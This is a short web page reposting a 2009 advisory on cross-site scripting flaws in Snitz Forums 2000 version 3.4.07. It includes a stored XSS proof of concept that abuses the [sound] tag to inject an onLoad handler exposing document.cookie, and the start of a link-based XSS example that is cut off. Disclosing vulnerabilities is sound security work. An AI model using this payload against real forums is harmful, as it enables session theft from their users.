menu
Be Secure
person
Sign Up
|
Log In
Home
My Info
Guestbook
Ad Board
Home
»
2009
»
October
» 19
Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities
******************************
******************************
**
Application: Snitz Forums 2000
Version affected: 3.4.07
Website:
http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Email:
andrea.fabrizi@gmail.com
Web:
http://www.andreafabrizi.it
Vuln: Multiple Cross-Site Scripting
******************************
******************************
**
###### PERMANENT XSS
If [sound] tag is allowed:
[sound]
http://url_to_valid_
mp3_or_m3u_file.m3u
"
onLoad="alert(document.cookie)
[/sound]
######
###### LINK XSS
http://localhost/forum/pop_
send_to_friend.asp
...
Read more »
Views:
13631
|
Added by:
apeh1706
|
Date:
19 October 2009
|
Comments (1)
close